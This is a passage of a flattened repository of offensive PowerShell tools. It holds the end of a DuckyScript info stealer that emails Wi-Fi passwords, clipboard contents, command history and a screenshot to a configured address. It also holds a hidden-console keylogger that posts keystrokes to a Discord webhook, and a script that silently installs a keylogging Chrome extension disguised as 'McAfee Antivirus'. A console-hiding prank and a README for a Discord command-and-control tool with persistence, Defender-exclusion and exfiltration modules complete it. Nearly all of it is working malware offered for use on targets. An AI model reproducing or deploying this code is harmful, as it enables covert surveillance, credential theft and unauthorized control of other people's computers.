"EMAIL_HERE";$pass = "PASSWORD_HERE" 29 | 30 | REM main powershell code 31 | STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) 32 | STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem 33 | STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount 34 | STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" 35 | STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version 36 | STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} 37 | 38 | STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" 39 | STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ 40 | STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" 41 | STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} 42 | STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 43 | 44 | STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 45 | STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 46 | STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 47 | STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 48 | STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 49 | STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append 50 | 51 | STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing 52 | STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top 53 | STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) 54 | STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) 55 | 56 | STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" 57 | STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) 58 | STRING ;$time = Get-Date;$ct = $time.addminutes($lost) 59 | STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl 60 | STRING ;sleep 10;exit 61 | ENTER 62 | -------------------------------------------------------------------------------- /Discord-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | # ===================================================================================================================================================== 3 | <# 4 | ExtraInfo: Get a list of further info and command examples 5 | 6 | Cleanup: Wipe history (run prompt, powershell, recycle bin, Temp) 7 | 8 | Kill: Stop a running module (eg. Keycapture / Exfiltrate) 9 | 10 | ControlAll: Control all waiting sessions simultaneously 11 | 12 | ShowAll: Control all waiting sessions simultaneously 13 | 14 | Pause: Pause the current authenticated session 15 | 16 | Close: Close this session 17 | 18 | #> 19 | # ===================================================================================================================================================== 20 | # shortened URL Detection 21 | if ($dc.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $dc = (irm $dc).url} 22 | 23 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 24 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 25 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 26 | if($hwnd -ne [System.IntPtr]::Zero){ 27 | $Type::ShowWindowAsync($hwnd, 0) 28 | } 29 | else{ 30 | $Host.UI.RawUI.WindowTitle = 'hideme' 31 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 32 | $hwnd = $Proc.MainWindowHandle 33 | $Type::ShowWindowAsync($hwnd, 0) 34 | } 35 | 36 | # Import DLL Definitions for keyboard inputs 37 | $API = @' 38 | [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 39 | public static extern short GetAsyncKeyState(int virtualKeyCode); 40 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 41 | public static extern int GetKeyboardState(byte[] keystate); 42 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 43 | public static extern int MapVirtualKey(uint uCode, int uMapType); 44 | [DllImport("user32.dll", CharSet=CharSet.Auto)] 45 | public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); 46 | '@ 47 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 48 | 49 | # Add stopwatch for intellegent sending 50 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 51 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 52 | 53 | # Start a continuous loop 54 | While ($true){ 55 | $keyPressed = $false 56 | try{ 57 | # Start a loop that checks the time since last activity before message is sent 58 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 59 | # Start the loop with 30 ms delay between keystate check 60 | Start-Sleep -Milliseconds 30 61 | for ($asc = 8; $asc -le 254; $asc++){ 62 | # Get the key state. (is any key currently pressed) 63 | $keyst = $API::GetAsyncKeyState($asc) 64 | # If a key is pressed 65 | if ($keyst -eq -32767) { 66 | # Restart the inactivity timer 67 | $keyPressed = $true 68 | $LastKeypressTime.Restart() 69 | $null = [console]::CapsLock 70 | # Translate the keycode to a letter 71 | $vtkey = $API::MapVirtualKey($asc, 3) 72 | # Get the keyboard state and create stringbuilder 73 | $kbst = New-Object Byte[] 256 74 | $checkkbst = $API::GetKeyboardState($kbst) 75 | $logchar = New-Object -TypeName System.Text.StringBuilder 76 | # Define the key that was pressed 77 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 78 | # Check for non-character keys 79 | $LString = $logchar.ToString() 80 | if ($asc -eq 8) {$LString = "[BKSP]"} 81 | if ($asc -eq 13) {$LString = "[ENT]"} 82 | if ($asc -eq 27) {$LString = "[ESC]"} 83 | # Add the key to sending variable 84 | $send += $LString 85 | } 86 | } 87 | } 88 | } 89 | } 90 | finally{ 91 | If ($keyPressed) { 92 | # Send the saved keys to a webhook 93 | $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 94 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 95 | $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' 96 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json 97 | Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys 98 | #Remove log file and reset inactivity check 99 | $send = "" 100 | $keyPressed = $false 101 | } 102 | } 103 | # reset stopwatch before restarting the loop 104 | $LastKeypressTime.Restart() 105 | Start-Sleep -Milliseconds 10 106 | } 107 | -------------------------------------------------------------------------------- /Windows-Idiot-Prank/main.ps1: -------------------------------------------------------------------------------- 1 | <# ================================================ WINDOWS IDIOT PRANK ======================================================== 2 | 3 | SYNOPSIS 4 | This script is a powershell interpretation of the famous windows idiot virus. 5 | 6 | USAGE 7 | Run the script 8 | stop in task manager (when console is hidden) 9 | 10 | #> 11 | 12 | Add-Type -AssemblyName System.Drawing 13 | Add-Type -AssemblyName System.Windows.Forms 14 | 15 | 16 | # Hide the Powershell console 17 | $hide = 1 18 | if ($hide -eq 1){ 19 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 20 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 21 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 22 | 23 | if ($hwnd -ne [System.IntPtr]::Zero) { 24 | $Type::ShowWindowAsync($hwnd, 0) 25 | } 26 | else { 27 | $Host.UI.RawUI.WindowTitle = 'hideme' 28 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 29 | $hwnd = $Proc.MainWindowHandle 30 | $Type::ShowWindowAsync($hwnd, 0) 31 | } 32 | } 33 | 34 | # Download sounds and images 35 | iwr -Uri 'https://i.ibb.co/gDVfZ0L/white.jpg' -OutFile "$env:TEMP\white.png" 36 | iwr -Uri 'https://i.ibb.co/0nxjGzH/black.jpg' -OutFile "$env:TEMP\black.png" 37 | iwr -Uri 'https://github.com/beigeworm/assets/raw/main/idiot.wav' -OutFile "$env:TEMP\sound.wav" 38 | sleep 1 39 | 40 | Function SpawnImage{ 41 | 42 | $job1 = { 43 | 44 | while ($true){ 45 | (New-Object Media.SoundPlayer "$env:TEMP\sound.wav").Play(); 46 | sleep 5 47 | } 48 | 49 | } 50 | 51 | $job2 = { 52 | 53 | Add-Type -AssemblyName System.Windows.Forms 54 | Add-Type -AssemblyName System.Drawing 55 | 56 | $form = New-Object System.Windows.Forms.Form 57 | $form.Text = "Idiot.exe" 58 | $form.Width = 350 59 | $form.Height = 300 60 | $form.TopMost = $true 61 | $form.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DFDWiz.exe") 62 | $form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog 63 | 64 | $screen = [System.Windows.Forms.Screen]::PrimaryScreen 65 | $Width = $screen.Bounds.Width 66 | $Height = $screen.Bounds.Height 67 | $X = [math]::Round($Width / 2) 68 | $Y = [math]::Round($Height / 2) 69 | 70 | $form.StartPosition = "Manual" 71 | $form.Location = [System.Drawing.Point]::new($X - $form.Width / 2, $Y - $form.Height / 2) 72 | 73 | $rand = New-Object System.Random 74 | $dx = $rand.Next(-10, 10) 75 | $dy = $rand.Next(-10, 10) 76 | 77 | $timer = New-Object System.Windows.Forms.Timer 78 | $timer.Interval = 10 79 | 80 | $image1 = [System.Drawing.Image]::FromFile("$env:TEMP\white.png") 81 | $image2 = [System.Drawing.Image]::FromFile("$env:TEMP\black.png") 82 | 83 | $images = @($image1, $image2) 84 | $imageIndex = 0 85 | $moveCount = 0 86 | 87 | function Set-BackgroundImage { 88 | param ( 89 | [System.Drawing.Image]$image 90 | ) 91 | $form.BackgroundImage = $image 92 | $form.BackgroundImageLayout = "Stretch" 93 | } 94 | 95 | $timer.Add_Tick({ 96 | $newX = $form.Location.X + $dx 97 | $newY = $form.Location.Y + $dy 98 | if ($newX -lt 0 -or $newX + $form.Width -gt $Width) { 99 | $script:dx = -$dx 100 | } 101 | if ($newY -lt 0 -or $newY + $form.Height -gt $Height) { 102 | $script:dy = -$dy 103 | } 104 | $form.Location = [System.Drawing.Point]::new( 105 | [Math]::Min([Math]::Max($newX, 0), $Width - $form.Width), 106 | [Math]::Min([Math]::Max($newY, 0), $Height - $form.Height) 107 | ) 108 | 109 | $script:moveCount++ 110 | if ($moveCount -ge 20) { 111 | $script:moveCount = 0 112 | $script:imageIndex = ($imageIndex + 1) % $images.Length 113 | Set-BackgroundImage $images[$imageIndex] 114 | } 115 | }) 116 | 117 | $timer.Start() 118 | $form.Add_Shown({ $form.Activate() }) 119 | [void]$form.ShowDialog() 120 | 121 | } 122 | 123 | Start-Job -ScriptBlock $job1 124 | Start-Job -ScriptBlock $job2 125 | 126 | } 127 | 128 | function MouseState { 129 | $previousState = [Windows.Forms.Control]::MouseButtons 130 | while ($true) { 131 | $currentState = [Windows.Forms.Control]::MouseButtons 132 | if ($previousState -ne $currentState) { 133 | Write-Host "Mouse Click Detected!" 134 | $previousState = $currentState 135 | SpawnImage 136 | break 137 | } 138 | Start-Sleep -Milliseconds 50 139 | } 140 | } 141 | 142 | while ($true){ 143 | MouseState 144 | Start-Sleep -Milliseconds 500 145 | } 146 | 147 | -------------------------------------------------------------------------------- /Chrome-Extension-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" # YOUR_WEBHOOK_HERE 2 | 3 | # Hide the console 4 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 5 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 6 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 7 | 8 | if ($hwnd -ne [System.IntPtr]::Zero) { 9 | $Type::ShowWindowAsync($hwnd, 0) 10 | } 11 | else { 12 | $Host.UI.RawUI.WindowTitle = 'hideme' 13 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 14 | $hwnd = $Proc.MainWindowHandle 15 | $Type::ShowWindowAsync($hwnd, 0) 16 | } 17 | 18 | # Webhook shortened URL handler 19 | $hookurl = (irm $hookurl).url 20 | 21 | # Create the extension file 22 | $DirPath = "C:\Users\Public\Chrome" 23 | New-Item -ItemType Directory -Path $DirPath 24 | 25 | # Create the Main Javascript file (main.js) 26 | $mainjs = @' 27 | let keys = ""; 28 | const current = document.URL; 29 | document.addEventListener("keydown", (event) => { 30 | const key = event.key; 31 | if (key === "Enter") { 32 | keys += "\n"; 33 | return; 34 | } 35 | if (key === "Backspace") { 36 | keys = keys.slice(0, keys.length - 1); 37 | return; 38 | } 39 | if (key === "CapsLock" || key === "Shift") { 40 | return; 41 | } 42 | if (key === "Control") { 43 | keys += "[Ctrl]"; 44 | return; 45 | } 46 | // Arrows 47 | if (key === "ArrowLeft") { 48 | keys += "[LeftArrow]"; 49 | return; 50 | } 51 | if (key === "ArrowRight") { 52 | keys += "[RightArrow]"; 53 | return; 54 | } 55 | if (key === "ArrowDown") { 56 | keys += "[DownArrow]"; 57 | return; 58 | } 59 | if (key === "ArrowUp") { 60 | keys += "[UpArrow]"; 61 | return; 62 | } 63 | // End arrows 64 | keys += key; 65 | saveKeysLocal(); 66 | }); 67 | 68 | window.setInterval(async () => { 69 | keys = getKeysLocal(); 70 | if (keys == "") { 71 | return; 72 | } 73 | const message = `<${current}>\nLogged Keystrokes: ` + "```" + keys + "```"; 74 | sendMessageToDiscord(discordWebhook, message); 75 | keys = ""; 76 | saveKeysLocal(); 77 | }, 20000); // time in milliseconds 78 | 79 | async function sendMessageToDiscord(webhook, msg) { 80 | await fetch(webhook, { 81 | method: "POST", 82 | headers: { 83 | "Content-Type": "application/json", 84 | }, 85 | body: JSON.stringify({ 86 | content: msg, 87 | }), 88 | }); 89 | } 90 | 91 | function saveKeysLocal() { 92 | localStorage.setItem("keys", keys); 93 | } 94 | 95 | function getKeysLocal() { 96 | return localStorage.getItem("keys"); 97 | } 98 | '@ 99 | $mainjs | Out-File -FilePath "$DirPath/main.js" -Encoding utf8 -Force 100 | 101 | # Create the service worker (background.js) 102 | $backgroundjs = @' 103 | chrome.runtime.onMessage.addListener( 104 | function (request, sender, sendResponse) { 105 | sendResponse(request); 106 | } 107 | ); 108 | '@ 109 | $backgroundjs | Out-File -FilePath "$DirPath/background.js" -Encoding utf8 -Force 110 | 111 | # Crwate the manifest file (manifest.json) 112 | $manifest = @' 113 | { 114 | "name": "McAfee Antivirus", 115 | "description": "Antivirus chrome extension made by McAfee. Browse securely on the internet!", 116 | "version": "2.2", 117 | "manifest_version": 3, 118 | "background": { 119 | "service_worker": "background.js" 120 | }, 121 | "content_scripts": [ 122 | { 123 | "matches": [ 124 | "*://*/*" 125 | ], 126 | "js": [ 127 | "Webhook.js", 128 | "main.js" 129 | ] 130 | } 131 | ] 132 | } 133 | '@ 134 | $manifest | Out-File -FilePath "$DirPath/manifest.json" -Encoding utf8 -Force 135 | 136 | #create the webhook file 137 | "const discordWebhook = `"$hookurl`";" | Out-File -FilePath "C:\Users\Public\Chrome\Webhook.js" -Encoding utf8 -Force 138 | 139 | # Send keys to manually open chrome and add extension 140 | $wshell = New-Object -ComObject wscript.shell 141 | Start-Process chrome.exe example.com 142 | sleep 7 143 | $wshell.AppActivate("chrome.exe") 144 | $wshell.SendKeys("{TAB}") ;sleep -m 500 145 | $wshell.SendKeys("{TAB}") ;sleep -m 500 146 | $wshell.SendKeys("{TAB}") ;sleep -m 500 147 | $wshell.SendKeys("chrome://extensions/") ;sleep -m 500 148 | $wshell.SendKeys("{ENTER}") ;sleep 4 149 | $wshell.SendKeys("{TAB}") ;sleep -m 500 150 | $wshell.SendKeys(" ") ;sleep 2 151 | $wshell.SendKeys("{TAB}") ;sleep -m 500 152 | $wshell.SendKeys("{ENTER}") ;sleep 4 153 | $wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 500 154 | $wshell.SendKeys("{ENTER}") ;sleep -m 1000 155 | $wshell.SendKeys("{BACKSPACE}") ;sleep -m 500 156 | $wshell.SendKeys("{ENTER}") 157 | 158 | # Kill Chrome process 159 | sleep 4 160 | $wshell.SendKeys("%{F4}") 161 | 162 | <# 163 | Add-Type -AssemblyName System.Windows.Forms 164 | [System.Windows.Forms.SendKeys]::SendWait('%{F4}') 165 | #> 166 | -------------------------------------------------------------------------------- /Discord-C2/README.md: -------------------------------------------------------------------------------- 1 | # PoshCord-C2 2 | 3 | **SYNOPSIS** 4 | 5 | Using a Discord bot along with discords API and Powershell to Act as a Command and Control Platform. 6 | 7 | **INFORMATION** 8 | 9 | This script uses a discord bot along with discords API to create a server channel that can control a windows pc. 10 | Every 10 seconds it will check for a new message in chat and interpret it as a custom command / module in powershell. 11 | 12 | **Demo** (using .vbs stager and python bot) 13 | 14 | ![GIF 3-14-2024 7-18-11 PM](https://github.com/beigeworm/PoshCord-C2/assets/93350544/d1805cf3-f850-45c1-b4d2-c342cc17ecdb) 15 | 16 | **SETUP** 17 | 1. Make a discord bot at https://discord.com/developers/applications/ 18 | 2. Turn on ALL intents in the 'Bot' tab. 19 | 20 | ![image](https://github.com/beigeworm/PoshCord-C2/assets/93350544/f4b381b1-9217-4469-90de-e913681aecd6) 21 | 22 | 3. Give these permissions in Oauth2 tab and copy link into a browser url bar 23 | 24 | ![Screenshot_1](https://github.com/beigeworm/PoshCord-C2/assets/93350544/1c944403-b4b0-4730-bc53-c958f4082ef9) 25 | 26 | 4. add the bot to your discord server 27 | 5. Click 'Reset Token' in "Bot" tab for your token 28 | 6. Change $tk below with your bot token 29 | 7. Change $ch below to the channel id of your channel. 30 | 31 | **USAGE** 32 | 1. Setup the script 33 | 2. Run the script on a target. 34 | 3. Check discord for 'waiting to connect..' message. 35 | 4. Type the computers name into chat to start a session 36 | 5. The session will be started in a newly created channel - (unles you use -nonew to use the maseter channel eg. `DESKTOP-3DG5fS -nonew`) 37 | 6. Use the commands listed below 38 | 39 | **MODULES / COMMANDS** 40 | 41 | *Write these in chat to run on the target.* 42 | 43 | - **SpeechToText**: Send audio transcript to Discord 44 | - **QuickInfo**: Send a quick System info embed (sent on first connect) 45 | - **Systeminfo**: Send System info as text file to Discord 46 | - **FolderTree**: Save folder trees to file and send to Discord 47 | - **EnumerateLAN**: Show devices on LAN (see ExtraInfo) 48 | - **NearbyWifi**: Show nearby wifi networks (!user popup!) 49 | - **ChromeDB**: Gather Database files from Chrome and send to Discord (view them in DBBrowser.exe) 50 | 51 | - **AddPersistance**: Add this script to startup. 52 | - **RemovePersistance**: Remove Poshcord from startup 53 | - **IsAdmin**: Check if the session is admin 54 | - **Elevate**: Attempt to restart script as admin (!user popup!) 55 | - **ExcludeCDrive**: Exclude C:/ Drive from all Defender Scans 56 | - **ExcludeAllDrives**: Exclude C:/ - G:/ Drives from Defender Scans 57 | - **EnableRDP**: Enable Remote Desktop on target. 58 | - **EnableIO**: Enable Keyboard and Mouse 59 | - **DisableIO**: Disable Keyboard and Mouse 60 | 61 | - **RecordAudio**: Record microphone and send to Discord 62 | - **RecordScreen**: Record Screen and send to Discord 63 | - **TakePicture**: Send a webcam picture and send to Discord 64 | - **Exfiltrate**: Send various files. (see ExtraInfo) 65 | - **Upload**: Upload a file from connected machine. (see ExtraInfo) 66 | - **Download**: Download a file to the current directory on the client. (attach a file with the command) 67 | - **Screenshot**: Sends a screenshot of the desktop and send to Discord 68 | - **Keycapture**: Capture Keystrokes and send to Discord 69 | 70 | - **FakeUpdate**: Spoof Windows-10 update screen using Chrome 71 | - **Windows93**: Start parody Windows93 using Chrome 72 | - **WindowsIdiot**: Start fake Windows95 using Chrome 73 | - **SendHydra**: Never ending popups (use killswitch) to stop 74 | - **SoundSpam**: Play all Windows default sounds on the target 75 | - **Message**: Send a message window to the User (!user popup!) 76 | - **VoiceMessage**: Send a message window to the User (!user popup!) 77 | - **MinimizeAll**: Send a voice message to the User 78 | - **EnableDarkMode**: Enable System wide Dark Mode 79 | - **DisableDarkMode**: Disable System wide Dark Mode\ 80 | - **VolumeMax**: Maximise System Volume 81 | - **VolumeMin**: Minimise System Volume 82 | - **ShortcutBomb**: Create 50 shortcuts on the desktop. 83 | - **Wallpaper**: Set the wallpaper (wallpaper -url http://img.com/f4wc) 84 | - **Goose**: Spawn an annoying goose (Sam Pearson App) 85 | 86 | - **ExtraInfo**: Get a list of further info and command examples 87 | - **Cleanup**: Wipe history (run prompt, powershell, recycle bin, Temp) 88 | - **Kill**: Stop a running module (eg. Keycapture / Exfiltrate) 89 | - **ControlAll**: Control all waiting sessions simultaneously 90 | - **ShowAll**: Control all waiting sessions simultaneously 91 | - **Pause**: Pause the current authenticated session 92 | - **Close**: Close this session 93 | 94 | 95 | **FEATURES** 96 | 97 | **Custom Scripting** 98 | 99 | You can add custom scripting / commands - Type 'YOUR CUSTOM POWERSHELL COMMAND' in chat 100 | 101 | **Mass Control Mode** 102 | 103 | Control all waiting sessions simultaneously with 'controll-all' to mass authenticate sessions. 104 | 105 | **Killswitch** 106 | 107 | Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. 108 | 109 | # If you like my work please leave a star. ⭐ 110 | --------------------------------------------------------------------------------